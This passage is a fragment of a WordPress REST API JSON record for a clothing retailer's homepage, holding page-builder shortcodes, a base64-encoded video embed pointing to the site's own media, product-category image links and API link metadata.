cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n<\/ul>\n<\/div><\/div><\/div>[\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=”stretch_row_content_no_spaces” no_padding=”yes” el_class=”mb-4 pb-2″][vc_column][vc_raw_html]JTNDdmlkZW8lMjBjbGFzcyUzRCUyMnZpZGVvJTIyJTIwbXV0ZWQlM0QlMjIlMjIlMjBwbGF5c2lubGluZSUzRCUyMiUyMiUyMHByZWxvYWQlM0QlMjJub25lJTIyJTIwYXV0b3BsYXklM0QlMjIlMjIlMjBsb29wJTNEJTIyJTIyJTIwd2lkdGglM0QlMjIxMDAlMjUlMjIlM0UlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0Nzb3VyY2UlMjB0eXBlJTNEJTIydmlkZW8lMkZtcDQlMjIlMjBzcmMlM0QlMjJodHRwcyUzQSUyRiUyRnB1bGthc2guY29tJTJGd3AtY29udGVudCUyRnVwbG9hZHMlMkYyMDIyJTJGMDQlMkZtYW5zaGEtb3B0LTIubXA0JTIyJTNFJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTNDJTJGdmlkZW8lM0U=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row wrap_container=”yes” no_padding=”yes” animation_delay=”200″ el_class=”home-bar”][vc_column][\/vc_column][\/vc_row][vc_row][vc_column width=”1\/2″][vc_single_image image=”943″ img_size=”full” alignment=”center” onclick=”custom_link” link=”https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/”][\/vc_column][vc_column width=”1\/2″][vc_single_image image=”944″ img_size=”full” alignment=”center” onclick=”custom_link” link=”https:\/\/pulkash.com\/product-category\/women\/stitched\/riwayat-chapter-2\/”][\/vc_column][\/vc_row][vc_row][vc_column][vc_custom_heading text=”Trending Products” font_container=”tag:h1|font_size:2rem|text_align:center|line_height:1.2″ use_theme_fonts=”yes” font_weight=”600″ letter_spacing=”-.01em” el_class=”mb-4″][\/vc_column][\/vc_row][vc_row content_placement=”middle” wrap_container=”yes” css=”.vc_custom_1605237378131{background-color: #d8dce5 !important;}” el_class=”home-trending”][vc_column el_class=”porto-ibanner-layer position-static pt-5 pb-lg-5″ offset=”vc_col-md-6″][vc_custom_heading text=”Volume 1″ font_container=”tag:h4|font_size:1.3125em|text_align:left|color:rgba(34%2C37%2C41%2C0.7)|line_height:1″ use_theme_fonts=”yes” font_weight=”500″ letter_spacing=”.125em” animation_delay=”200″ el_class=”mb-1″][\/vc_column][vc_column width=”2\/3″ animation_delay=”1200″ offset=”vc_col-md-4″ el_class=”z-index-2″][vc_single_image image=”763″ img_size=”full” alignment=”center” el_class=”mb-0 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/pages\/2"}],"collection":[{"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":38,"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":958,"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/pages\/2\/revisions\/958"}],"wp:attachment":[{"href":"https:\/\/pulkash.com\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}